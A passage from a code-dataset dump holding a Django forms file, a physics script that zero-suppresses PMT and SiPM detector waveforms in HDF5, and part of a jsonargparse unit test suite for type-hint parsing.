descripcion de la Compra\"}),\n 'precio': TextInput(attrs={'placeholder': 'Precio', 'class': \"form-control\", 'data-trigger': \"hover\",'title':\"Precio\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'data-content':\"Precio total de la compra (COP)\"})}\n error_messages = {'cantidad':{'required':(\"Cantidad\")},\n 'descripcion':{'required':(\"Descripcion de compra\")},\n 'precio':{'required': (\"Precio\")}}\n\nclass DevolucionForm(ModelForm):\n class Meta:\n model = Devolucion\n exclude = ('eliminado', 'cliente',)\n widgets = {\n 'numeroDevolucion': NumberInput(attrs={'placeholder': 'Numero de Devolucion','class': \"form-control\", 'data-trigger': \"hover\",'title':\"Numero de Devolucion\", 'data-placement': \"top\", 'data-toggle': \"popover\"}),\n 'valor': NumberInput(attrs={'placeholder': 'Valor','class': \"form-control\", 'data-trigger': \"hover\",'title':\"Valor\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'data-content':\"Dinero a devolver\"}),\n 'concepto': Textarea(attrs={'placeholder': 'Concepto', 'class': \"form-control\", 'data-trigger': \"hover\",'title':\"Concepto\", 'data-placement': \"top\", 'data-toggle': \"popover\"})}\n error_messages = {'numeroDevolucion':{'required':(\"Numero de la devolucion\")},\n 'valor':{'required':(\"Valor\")},\n 'concepto':{'required':(\"Concepto\")},}\n","sub_path":"aplicacion/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":9027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"287037495","text":"\"\"\"\nANASTASIA\nGML October 2016\n\nWhat ANASTASIA does:\n1) Reads a hdf5 file containing the PMT's CWF and the SiPMs' RWF in ADC counts.\n2) Creates a single \"big\" PMT summing up PMTs' waveforms.\n3) Subtracts the SiPMs' baseline.\n4) Applies zero-suppression to both the big PMT and the individual SiPMs.\n5) Converts the waveforms from adc to pes.\n6) Writes the ZS waveforms in the same file as earrays.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport sys\nfrom time import time\n\nimport numpy as np\nimport tables as tb\nimport scipy as sc\nimport scipy.signal\n\nfrom LogConfig import logger\nfrom Configure import configure, define_event_loop\n\nimport sensorFunctions as snf\nimport wfmFunctions as wfm\n\nfrom RandomSampling import NoiseSampler as SiPMsNoiseSampler\n\"\"\"\n\nANASTASIA\nChangeLog:\n\n14.10 First version.\n\n18.10 Big PMT and ZS methods implemented.\n\n21.10 Several fixes. PRE-RELEASE.\n\n31.10 Baseline subtraction for SiPMs introduced.\n\n\"\"\"\n\n\ndef ANASTASIA(argv):\n \"\"\"\n ANASTASIA driver\n \"\"\"\n DEBUG_LEVEL, INFO, CFP = configure(argv[0], argv[1:])\n\n if INFO:\n print(__doc__)\n\n PATH_IN = CFP[\"PATH_IN\"]\n FILE_IN = CFP[\"FILE_IN\"]\n PATH_DB = CFP[\"PATH_DB\"]\n FIRST_EVT = CFP[\"FIRST_EVT\"]\n LAST_EVT = CFP[\"LAST_EVT\"]\n RUN_ALL = CFP[\"RUN_ALL\"]\n NEVENTS = LAST_EVT - FIRST_EVT\n\n PMT_NOISE_CUT_RAW = CFP[\"PMT_NOISE_CUT_RAW\"]\n PMT_NOISE_CUT_BLR = CFP[\"PMT_NOISE_CUT_BLR\"]\n SIPM_ZS_METHOD = CFP[\"SIPM_ZS_METHOD\"]\n SIPM_NOISE_CUT = CFP[\"SIPM_NOISE_CUT\"]\n\n logger.info(\"Debug level = {}\".format(DEBUG_LEVEL))\n logger.info(\"input file = {}/{}\".format(PATH_IN, FILE_IN))\n logger.info(\"path to database = {}\".format(PATH_DB))\n logger.info(\"First event = {} last event = {} \"\n \"# events requested = {}\".format(FIRST_EVT, LAST_EVT, NEVENTS))\n logger.info(\"ZS method PMTS RAW = {}. \"\n \"Cut value = {}\".format(\"RMS_CUT\", PMT_NOISE_CUT_RAW))\n logger.info(\"ZS method PMTS BLR = {}. \"\n \"Cut value = {}\".format(\"ABSOLUTE\", PMT_NOISE_CUT_BLR))\n logger.info(\"ZS method SIPMS = {}. \"\n \"Cut value = {}\".format(SIPM_ZS_METHOD, SIPM_NOISE_CUT))\n\n with tb.open_file(\"{}/{}\".format(PATH_IN, FILE_IN), \"r+\") as h5in:\n pmtblr = h5in.root.RD.pmtblr\n pmtcwf = h5in.root.RD.pmtcwf\n sipmrwf = h5in.root.RD.sipmrwf\n pmtdata = h5in.root.Sensors.DataPMT\n blrdata = h5in.root.Sensors.DataBLR\n sipmdata = h5in.root.Sensors.DataSiPM\n pmtdfraw = snf.read_data_sensors(pmtdata)\n pmtdfblr = snf.read_data_sensors(blrdata)\n sipmdf = snf.read_data_sensors(sipmdata)\n\n NEVT, NPMT, PMTWL = pmtcwf.shape\n NEVT, NSIPM, SIPMWL = sipmrwf.shape\n\n logger.info(\"# events in DST = {}\".format(NEVT))\n logger.info(\"#PMTs = {} #SiPMs = {}\".format(NPMT, NSIPM))\n logger.info(\"PMT WFL = {} SiPM WFL = {}\".format(PMTWL, SIPMWL))\n\n # Calibration constants and their average\n pmt_cal_consts_raw = abs(pmtdfraw[\"adc_to_pes\"].reshape(NPMT, 1))\n pmt_cal_consts_blr = abs(pmtdfblr[\"adc_to_pes\"].reshape(NPMT, 1))\n pmt_ave_consts_raw = np.mean(pmt_cal_consts_raw)\n pmt_ave_consts_blr = np.mean(pmt_cal_consts_blr)\n\n # FEE noise in ADC\n noise_adc = 0.789#h5in.root.MC.FEE.col(\"noise_adc\")[0]\n\n # Create instance of the noise sampler and compute noise thresholds\n sipms_noise_sampler_ = SiPMsNoiseSampler(PATH_DB+\"/NoiseSiPM_NEW.h5\",\n SIPMWL)\n\n # Increate thresholds by 1% for safety\n pmts_noise_threshold_raw_ = (PMT_NOISE_CUT_RAW * NPMT /\n pmt_ave_consts_raw * 1.01)\n pmts_noise_threshold_blr_ = (PMT_NOISE_CUT_BLR * noise_adc /\n pmt_ave_consts_blr * NPMT**0.5 * 1.01)\n\n if SIPM_ZS_METHOD == \"FRACTION\":\n sipms_thresholds_ = sipms_noise_sampler_.ComputeThresholds(\n SIPM_NOISE_CUT, sipmdf['adc_to_pes'])\n else:\n sipms_thresholds_ = np.ones(NSIPM) * SIPM_NOISE_CUT\n\n if \"/ZS\" not in h5in:\n h5in.create_group(h5in.root, \"ZS\")\n if \"/ZS/PMT\" in h5in:\n h5in.remove_node(\"/ZS\", \"PMT\")\n if \"/ZS/BLR\" in h5in:\n h5in.remove_node(\"/ZS\", \"BLR\")\n if \"/ZS/SiPM\" in h5in:\n h5in.remove_node(\"/ZS\", \"SiPM\")\n\n # Notice the Int16, not Float32! bad for compression\n pmt_zs_ = h5in.create_earray(h5in.root.ZS, \"PMT\",\n atom=tb.Int16Atom(),\n shape=(0, 1, PMTWL),\n expectedrows=NEVT)\n\n pmt_zs_blr_ = h5in.create_earray(h5in.root.ZS, \"BLR\",\n atom=tb.Int16Atom(),\n shape=(0, 1, PMTWL),\n expectedrows=NEVT)\n\n sipm_zs_ = h5in.create_earray(h5in.root.ZS, \"SiPM\",\n atom=tb.Int16Atom(),\n shape=(0, NSIPM, SIPMWL),\n expectedrows=NEVT)\n\n first_evt, last_evt = define_event_loop(FIRST_EVT, LAST_EVT,\n NEVENTS, NEVT, RUN_ALL)\n\n t0 = time()\n for i in range(first_evt, last_evt):\n logger.info(\"-->event number ={}\".format(i))\n\n # Integrate PMT plane in pes (not in time!)\n pmtcwf_int_pes = (pmtcwf[i] / pmt_cal_consts_raw).sum(axis=0)\n pmtblr_int_pes = (pmtblr[i] / pmt_cal_consts_blr).sum(axis=0)\n\n # suppress_wf puts zeros where the wf is below the threshold\n pmtcwf_int_pes = wfm.suppress_wf(pmtcwf_int_pes,\n pmts_noise_threshold_raw_)\n pmtblr_int_pes = wfm.suppress_wf(pmtblr_int_pes,\n pmts_noise_threshold_blr_)\n\n pmt_zs_.append(pmtcwf_int_pes.reshape(1, 1, PMTWL))\n pmt_zs_blr_.append(pmtblr_int_pes.reshape(1, 1, PMTWL))\n\n SiPMdata = wfm.subtract_baseline(sipmrwf[i], None)\n SiPMdata = wfm.noise_suppression(SiPMdata, sipms_thresholds_)\n #SiPMdata = wfm.to_pes(SiPMdata, sipmdf)\n\n sipm_zs_.append(SiPMdata.reshape(1, NSIPM, SIPMWL))\n t1 = time()\n dt = t1-t0\n\n print(\"ANASTASIA has run over {} events in {} seconds\".format(i, dt))\n print(\"Leaving ANASTASIA. Safe travels!\")\n\n\nif __name__ == \"__main__\":\n from cities import anastasia\n print(anastasia)\n ANASTASIA(sys.argv)\n","sub_path":"Cities/ANASTASIA.py","file_name":"ANASTASIA.py","file_ext":"py","file_size_in_byte":6644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"438205976","text":"#!/usr/bin/env python3\n\nimport json\nimport os\nimport pathlib\nimport random\nimport re\nimport sys\nimport unittest\nimport uuid\nimport warnings\nimport yaml\nfrom calendar import Calendar\nfrom contextlib import redirect_stderr, redirect_stdout\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom enum import Enum\nfrom gzip import GzipFile\nfrom io import StringIO\nfrom typing import Any, Callable, Dict, Iterable, List, Mapping, Optional, Sequence, Tuple, Type, Union\nfrom jsonargparse import ActionConfigFile, ArgumentParser, CLI, lazy_instance, Namespace, ParserError, Path\nfrom jsonargparse.typehints import ActionTypeHint, is_optional, Literal\nfrom jsonargparse.typing import (\n Email,\n NotEmptyStr,\n OpenUnitInterval,\n Path_drw,\n Path_fc,\n Path_fr,\n path_type,\n PositiveInt,\n register_type,\n restricted_number_type,\n)\nfrom jsonargparse_tests.base import mock_module, TempDirTestCase\n\n\nclass TypeHintsTests(unittest.TestCase):\n\n def test_add_argument_type_hint(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--op1', type=Optional[Union[PositiveInt, OpenUnitInterval]])\n self.assertEqual(0.1, parser.parse_args(['--op1', '0.1']).op1)\n self.assertEqual(0.9, parser.parse_args(['--op1', '0.9']).op1)\n self.assertEqual(1, parser.parse_args(['--op1', '1']).op1)\n self.assertEqual(12, parser.parse_args(['--op1', '12']).op1)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--op1', '0.0']))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--op1', '4.5']))\n parser.add_argument('--op2', type=Optional[Email])\n self.assertEqual('a@b.c', parser.parse_args(['--op2', 'a@b.c']).op2)\n self.assertIsNone(parser.parse_args(['--op2=null']).op2)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--op2', 'abc']))\n\n\n def test_type_hint_action_failure(self):\n parser = ArgumentParser(error_handler=None)\n self.assertRaises(ValueError, lambda: parser.add_argument('--op1', type=Optional[bool], action=True))\n\n\n def test_bool(self):\n parser = ArgumentParser(prog='app', default_env=True, error_handler=None)\n parser.add_argument('--val', type=bool)\n self.assertEqual(None, parser.get_defaults().val)\n self.assertEqual(True, parser.parse_args(['--val', 'true']).val)\n self.assertEqual(True, parser.parse_args(['--val', 'TRUE']).val)\n self.assertEqual(False, parser.parse_args(['--val', 'false']).val)\n self.assertEqual(False, parser.parse_args(['--val', 'FALSE']).val)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--val', '1']))\n\n os.environ['APP_VAL'] = 'true'\n self.assertEqual(True, parser.parse_args([]).val)\n os.environ['APP_VAL'] = 'True'\n self.assertEqual(True, parser.parse_args([]).val)\n os.environ['APP_VAL'] = 'false'\n self.assertEqual(False, parser.parse_args([]).val)\n os.environ['APP_VAL'] = 'False'\n self.assertEqual(False, parser.parse_args([]).val)\n os.environ['APP_VAL'] = '2'\n self.assertRaises(ParserError, lambda: parser.parse_args(['--val', 'a']))\n del os.environ['APP_VAL']\n\n\n def test_no_str_strip(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--op', type=Optional[str])\n parser.add_argument('--cfg', action=ActionConfigFile)\n self.assertEqual(' ', parser.parse_args(['--op', ' ']).op)\n self.assertEqual('', parser.parse_args(['--op', '']).op)\n self.assertEqual(' abc ', parser.parse_args(['--op= abc ']).op)\n self.assertEqual(' ', parser.parse_args(['--cfg={\"op\":\" \"}']).op)\n self.assertIsNone(parser.parse_args(['--op=null']).op)\n\n\n def test_str_not_timestamp_issue_135(self):\n parser = ArgumentParser()\n parser.add_argument('foo', type=str)\n self.assertEqual('2022-04-12', parser.parse_args(['2022-04-12']).foo)\n self.assertEqual('2022-04-32', parser.parse_args(['2022-04-32']).foo)\n\n\n def test_list(self):\n for list_type in [Iterable, List, Sequence]:\n with self.subTest(str(list_type)):\n parser = ArgumentParser()\n parser.add_argument('--list', type=list_type[int])\n cfg = parser.parse_args(['--list=[1, 2]'])\n self.assertEqual([1, 2], cfg.list)\n\n\n def test_enum(self):\n class MyEnum(Enum):\n A = 1\n B = 2\n C = 3\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--enum', type=MyEnum, default=MyEnum.C, help='Description')\n\n for val in ['A', 'B', 'C']:\n self.assertEqual(MyEnum[val], parser.parse_args(['--enum='+val]).enum)\n for val in ['X', 'b', 2]:\n self.assertRaises(ParserError, lambda: parser.parse_args(['--enum='+str(val)]))\n\n cfg = parser.parse_args(['--enum=C'], with_meta=False)\n self.assertEqual('enum: C\\n', parser.dump(cfg))\n\n help_str = StringIO()\n parser.print_help(help_str)\n self.assertIn('Description (type: MyEnum, default: C)', help_str.getvalue())\n\n\n def test_list_enum(self):\n class MyEnum(Enum):\n ab = 0\n xy = 1\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--list', type=List[MyEnum])\n self.assertEqual([MyEnum.xy, MyEnum.ab], parser.parse_args(['--list=[\"xy\", \"ab\"]']).list)\n\n\n def test_list_union(self):\n class MyEnum(Enum):\n ab = 1\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--list1', type=List[Union[float, str, type(None)]])\n parser.add_argument('--list2', type=List[Union[int, MyEnum]])\n self.assertEqual([1.2, 'ab'], parser.parse_args(['--list1=[1.2, \"ab\"]']).list1)\n self.assertEqual([3, MyEnum.ab], parser.parse_args(['--list2=[3, \"ab\"]']).list2)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--list1={\"a\":1, \"b\":\"2\"}']))\n\n\n def test_dict(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--dict', type=dict)\n self.assertEqual({}, parser.parse_args(['--dict={}'])['dict'])\n self.assertEqual({'a': 1, 'b': '2'}, parser.parse_args(['--dict={\"a\":1, \"b\":\"2\"}'])['dict'])\n self.assertRaises(ParserError, lambda: parser.parse_args(['--dict=1']))\n\n\n def test_dict_items(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--dict', type=Dict[str, int])\n cfg = parser.parse_args(['--dict.one=1', '--dict.two=2'])\n self.assertEqual(cfg.dict, {'one': 1, 'two': 2})\n\n\n def test_dict_union(self):\n class MyEnum(Enum):\n ab = 1\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--dict1', type=Dict[int, Optional[Union[float, MyEnum]]])\n parser.add_argument('--dict2', type=Dict[str, Union[bool, Path_fc]])\n cfg = parser.parse_args(['--dict1={\"2\":4.5, \"6\":\"ab\"}', '--dict2={\"a\":true, \"b\":\"f\"}'])\n self.assertEqual({2: 4.5, 6: MyEnum.ab}, cfg['dict1'])\n self.assertEqual({'a': True, 'b': 'f'}, cfg['dict2'])\n self.assertIsInstance(cfg['dict2']['b'], Path)\n self.assertEqual({5: None}, parser.parse_args(['--dict1={\"5\":null}'])['dict1'])\n self.assertRaises(ParserError, lambda: parser.parse_args(['--dict1=[\"a\", \"b\"]']))\n cfg = yaml.safe_load(parser.dump(cfg))\n self.assertEqual({'dict1': {'2': 4.5, '6': 'ab'}, 'dict2': {'a': True, 'b': 'f'}}, cfg)\n\n\n def test_tuple(self):\n class MyEnum(Enum):\n ab = 1\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--tuple', type=Tuple[Union[int, MyEnum], Path_fc, NotEmptyStr])\n cfg = parser.parse_args(['--tuple=[2, \"a\", \"b\"]'])\n self.assertEqual((2, 'a', 'b'), cfg.tuple)\n self.assertIsInstance(cfg.tuple[1], Path)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--tuple=[]']))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--tuple=[2, \"a\", \"b\", 5]']))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--tuple=[2, \"a\"]']))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--tuple=[\"2\", \"a\", \"b\"]']))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--tuple={\"a\":1, \"b\":\"2\"}']))\n out = StringIO()\n parser.print_help(out)\n self.assertIn('--tuple [ITEM,...] (type: Tuple[Union[int, MyEnum], Path_fc, NotEmptyStr], default: null)', out.getvalue())\n\n\n def test_tuple_untyped(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--tuple', type=tuple)\n cfg = parser.parse_args(['--tuple=[1, \"a\", True]'])\n self.assertEqual((1, 'a', True), cfg.tuple)\n out = StringIO()\n parser.print_help(out)\n self.assertIn('--tuple [ITEM,...] (type: tuple, default: null)', out.getvalue())\n\n\n def test_nested_tuples(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--tuple', type=Tuple[Tuple[str, str], Tuple[Tuple[int, float], Tuple[int, float]]])\n cfg = parser.parse_args(['--tuple=[[\"foo\", \"bar\"], [[1, 2.02], [3, 3.09]]]'])\n self.assertEqual((('foo', 'bar'), ((1, 2.02), (3, 3.09))), cfg.tuple)\n\n\n def test_list_tuple(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--list', type=List[Tuple[int, float]])\n cfg = parser.parse_args(['--list=[[1, 2.02], [3, 3.09]]'])\n self.assertEqual([(1, 2.02), (3, 3.09)], cfg.list)\n\n\n def test_list_str_positional(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('list', type=List[str])\n cfg = parser.parse_args(['[\"a\", \"b\"]'])\n self.assertEqual(cfg.list, ['a', 'b'])\n\n\n def test_tuple_ellipsis(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--tuple', type=Tuple[float, ...])\n self.assertEqual((1.2,), parser.parse_args(['--tuple=[1.2]']).tuple)\n self.assertEqual((1.2, 3.4), parser.parse_args(['--tuple=[1.2, 3.4]']).tuple)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--tuple=[]']))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--tuple=[2, \"a\"]']))\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--tuple', type=Tuple[Tuple[str, str], Tuple[Tuple[int, float], ...]])\n cfg = parser.parse_args(['--tuple=[[\"foo\", \"bar\"], [[1, 2.02], [3, 3.09]]]'])\n self.assertEqual((('foo', 'bar'), ((1, 2.02), (3, 3.09))), cfg.tuple)\n\n\n def test_complex_number(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--complex', type=complex)\n cfg = parser.parse_args(['--complex=(2+3j)'])\n self.assertEqual(cfg.complex, 2+3j)\n self.assertEqual(parser.dump(cfg), 'complex: (2+3j)\\n')\n\n\n def test_list_append(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--val', type=Union[int, str, List[int]])\n self.assertEqual(0, parser.parse_args(['--val=0']).val)\n self.assertEqual([0], parser.parse_args(['--val+=0']).val)\n self.assertEqual([1, 2, 3], parser.parse_args(['--val=1', '--val+=2', '--val+=3']).val)\n self.assertEqual([1, 2, 3], parser.parse_args(['--val=[1,2]', '--val+=3']).val)\n self.assertEqual([1], parser.parse_args(['--val=a', '--val+=1']).val)\n with warnings.catch_warnings(record=True) as w:\n self.assertEqual(3, parser.parse_args(['--val=[1,2]', '--val=3']).val)\n self.assertIn('Replacing list value \"[1, 2]\" with \"3\"', str(w[0].message))\n\n\n def test_list_append_config(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--cfg', action=ActionConfigFile)\n parser.add_argument('--val', type=List[int], default=[1, 2])\n self.assertEqual([3, 4], parser.parse_args(['--cfg', 'val: [3, 4]']).val)\n self.assertEqual([1, 2, 3], parser.parse_args(['--cfg', 'val+: 3']).val)\n self.assertEqual([1, 2, 3, 4], parser.parse_args(['--cfg', 'val+: [3, 4]']).val)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--cfg', 'val+: a']))\n\n\n def test_list_append_subcommand_subclass(self):\n class A:\n def __init__(self, cals: Union[Calendar, List[Calendar]] = None):\n self.cals = cals\n\n parser = ArgumentParser(error_handler=None)\n subparser = ArgumentParser()\n subparser.add_class_arguments(A, 'a')\n subcommands = parser.add_subcommands()\n subcommands.add_subcommand('cmd', subparser)\n cfg = parser.parse_args([\n 'cmd',\n '--a.cals+=Calendar',\n '--a.cals.firstweekday=3',\n '--a.cals+=TextCalendar',\n '--a.cals.firstweekday=1',\n ])\n self.assertEqual(['calendar.Calendar', 'calendar.TextCalendar'], [x.class_path for x in cfg.cmd.a.cals])\n self.assertEqual([3, 1], [x.init_args.firstweekday for x in cfg.cmd.a.cals])\n cfg = parser.parse_args(['cmd', f'--a={json.dumps(cfg.cmd.a.as_dict())}', '--a.cals.firstweekday=4'])\n self.assertEqual(Namespace(firstweekday=4), cfg.cmd.a.cals[-1].init_args)\n\n\n def test_restricted_number_type(self):\n limit_val = random.randint(100, 10000)\n larger_than = restricted_number_type(f'larger_than_{limit_val}', int, ('>', limit_val))\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--val', type=larger_than, default=limit_val+1, help='Description')\n\n self.assertEqual(limit_val+1, parser.parse_args([f'--val={limit_val+1}']).val)\n self.assertRaises(ParserError, lambda: parser.parse_args([f'--val={limit_val-1}']))\n\n help_str = StringIO()\n parser.print_help(help_str)\n self.assertIn(f'Description (type: larger_than_{limit_val}, default: {limit_val+1})', help_str.getvalue())\n\n\n def test_type_Any(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--any', type=Any)\n self.assertEqual('abc', parser.parse_args(['--any=abc'])['any'])\n self.assertEqual(123, parser.parse_args(['--any=123'])['any'])\n self.assertEqual(5.6, parser.parse_args(['--any=5.6'])['any'])\n self.assertEqual([7, 8], parser.parse_args(['--any=[7, 8]'])['any'])\n self.assertEqual({\"a\":0, \"b\":1}, parser.parse_args(['--any={\"a\":0, \"b\":1}'])['any'])\n self.assertTrue(parser.parse_args(['--any=True'])['any'])\n self.assertFalse(parser.parse_args(['--any=False'])['any'])\n self.assertIsNone(parser.parse_args(['--any=null'])['any'])\n self.assertEqual(' ', parser.parse_args(['--any= '])['any'])\n self.assertEqual(' xyz ', parser.parse_args(['--any= xyz '])['any'])\n self.assertEqual('[[[', parser.parse_args(['--any=[[['])['any'])\n\n\n @unittest.skipIf(not Literal, 'Literal introduced in python 3.8 or backported in typing_extensions')\n def test_Literal(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--str', type=Literal['a', 'b', None])\n parser.add_argument('--int', type=Literal[3, 4])\n parser.add_argument('--true', type=Literal[True])\n parser.add_argument('--false', type=Literal[False])\n self.assertEqual('a', parser.parse_args(['--str=a']).str)\n self.assertEqual('b', parser.parse_args(['--str=b']).str)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--str=x']))\n self.assertIsNone(parser.parse_args(['--str=null']).str)\n self.assertEqual(4, parser.parse_args(['--int=4']).int)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--int=5']))\n self.assertIs(True, parser.parse_args(['--true=true']).true)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--true=false']))\n self.assertIs(False, parser.parse_args(['--false=false']).false)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--false=true']))\n out = StringIO()\n parser.print_help(out)\n for value in ['--str {a,b,null}', '--int {3,4}', '--true True', '--false False']:\n self.assertIn(value, out.getvalue())\n\n\n def test_nested_mapping_without_args(self):\n parser = ArgumentParser()\n parser.add_argument('--map', type=Mapping[str, Union[int, Mapping]])\n self.assertEqual(parser.parse_args(['--map={\"a\": 1}']).map, {\"a\": 1})\n self.assertEqual(parser.parse_args(['--map={\"b\": {\"c\": 2}}']).map, {\"b\": {\"c\": 2}})\n\n\n def _test_typehint_non_parameterized_types(self, type):\n parser = ArgumentParser(error_handler=None)\n ActionTypeHint.is_supported_typehint(type, full=True)\n parser.add_argument('--type', type=type)\n cfg = parser.parse_args(['--type=uuid.UUID'])\n self.assertEqual(cfg.type, uuid.UUID)\n self.assertEqual(parser.dump(cfg), 'type: uuid.UUID\\n')\n\n\n def _test_typehint_parameterized_types(self, type):\n parser = ArgumentParser(error_handler=None)\n ActionTypeHint.is_supported_typehint(type, full=True)\n parser.add_argument('--cal', type=type[Calendar])\n cfg = parser.parse_args(['--cal=calendar.Calendar'])\n self.assertEqual(cfg.cal, Calendar)\n self.assertEqual(parser.dump(cfg), 'cal: calendar.Calendar\\n')\n self.assertRaises(ParserError, lambda: parser.parse_args(['--cal=uuid.UUID']))\n\n\n def test_typehint_Type(self):\n self._test_typehint_non_parameterized_types(type=Type)\n self._test_typehint_parameterized_types(type=Type)\n\n\n def test_typehint_non_parameterized_type(self):\n self._test_typehint_non_parameterized_types(type=type)\n\n\n @unittest.skipIf(sys.version_info[:2] < (3, 9), '[] support for builtins introduced in python 3.9')\n def test_typehint_parametrized_type(self):\n self._test_typehint_parameterized_types(type=type)\n\n\n def test_uuid(self):\n id1 = uuid.uuid4()\n id2 = uuid.uuid4()\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--uuid', type=uuid.UUID)\n parser.add_argument('--uuids', type=List[uuid.UUID])\n cfg = parser.parse_args(['--uuid='+str(id1), '--uuids=[\"'+str(id1)+'\", \"'+str(id2)+'\"]'])\n self.assertEqual(cfg.uuid, id1)\n self.assertEqual(cfg.uuids, [id1, id2])\n self.assertEqual('uuid: '+str(id1)+'\\nuuids:\\n- '+str(id1)+'\\n- '+str(id2)+'\\n', parser.dump(cfg))\n\n\n @unittest.skipIf(sys.version_info[:2] < (3, 10), 'new union syntax introduced in python 3.10')\n def test_union_new_syntax(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--str', type=eval('int | None'))\n self.assertEqual(123, parser.parse_args(['--str=123']).str)\n self.assertIsNone(parser.parse_args(['--str=null']).str)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--str=abc']))\n\n\n def test_Callable_with_function_path(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--callable', type=Callable, default=lazy_instance)\n parser.add_argument('--list', type=List[Callable])\n\n cfg = parser.parse_args(['--callable=jsonargparse.CLI'])\n self.assertEqual(CLI, cfg.callable)\n self.assertEqual(parser.dump(cfg), 'callable: jsonargparse.CLI\\n')\n self.assertEqual([CLI], parser.parse_args(['--list=[jsonargparse.CLI]']).list)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--callable=jsonargparse.not_exist']))\n\n out = StringIO()\n parser.print_help(out)\n self.assertIn('(type: Callable, default: jsonargparse.lazy_instance)', out.getvalue())\n\n\n def test_Callable_with_class_path(self):\n class MyFunc1:\n def __init__(self, p1: int = 1):\n self.p1 = p1\n def __call__(self):\n return self.p1\n\n class MyFunc2(MyFunc1):\n pass\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--callable', type=Callable)\n\n with mock_module(MyFunc1, MyFunc2) as module:\n value = {'class_path': f'{module}.MyFunc2', 'init_args': {'p1': 1}}\n cfg = parser.parse_args([f'--callable={module}.MyFunc2'])\n self.assertEqual(cfg.callable.as_dict(), value)\n value = {'class_path': f'{module}.MyFunc1', 'init_args': {'p1': 2}}\n cfg = parser.parse_args([f'--callable={json.dumps(value)}'])\n self.assertEqual(cfg.callable.as_dict(), value)\n self.assertEqual(yaml.safe_load(parser.dump(cfg))['callable'], value)\n cfg_init = parser.instantiate_classes(cfg)\n self.assertIsInstance(cfg_init.callable, MyFunc1)\n self.assertEqual(cfg_init.callable(), 2)\n\n self.assertRaises(ParserError, lambda: parser.parse_args(['--callable={}']))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--callable=jsonargparse.SUPPRESS']))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--callable=calendar.Calendar']))\n value = {'class_path': f'{module}.MyFunc1', 'key': 'val'}\n self.assertRaises(ParserError, lambda: parser.parse_args([f'--callable={json.dumps(value)}']))\n\n\n def test_typed_Callable_with_function_path(self):\n def my_func_1(p: int) -> str:\n return str(p)\n\n def my_func_2(p: str) -> int:\n return int(p)\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--callable', type=Callable[[int], str])\n\n with mock_module(my_func_1, my_func_2) as module:\n cfg = parser.parse_args([f'--callable={module}.my_func_1'])\n self.assertEqual(my_func_1, cfg.callable)\n cfg = parser.parse_args([f'--callable={module}.my_func_2'])\n self.assertEqual(my_func_2, cfg.callable) # Currently callable types are ignored\n\n\n def test_class_type(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--op', type=Optional[List[Calendar]])\n\n class_path = '\"class_path\": \"calendar.Calendar\"'\n expected = [{'class_path': 'calendar.Calendar', 'init_args': {'firstweekday': 0}}]\n cfg = parser.parse_args(['--op=[{'+class_path+'}]'])\n self.assertEqual(cfg.as_dict()['op'], expected)\n cfg = parser.parse_args(['--op=[\"calendar.Calendar\"]'])\n self.assertEqual(cfg.as_dict()['op'], expected)\n cfg = parser.instantiate_classes(cfg)\n self.assertIsInstance(cfg['op'][0], Calendar)\n\n with self.assertRaises(ParserError):\n parser.parse_args(['--op=[{\"class_path\": \"jsonargparse.ArgumentParser\"}]'])\n with self.assertRaises(ParserError):\n parser.parse_args(['--op=[{\"class_path\": \"jsonargparse.NotExist\"}]'])\n with self.assertRaises(ParserError):\n parser.parse_args(['--op=[{\"class_path\": 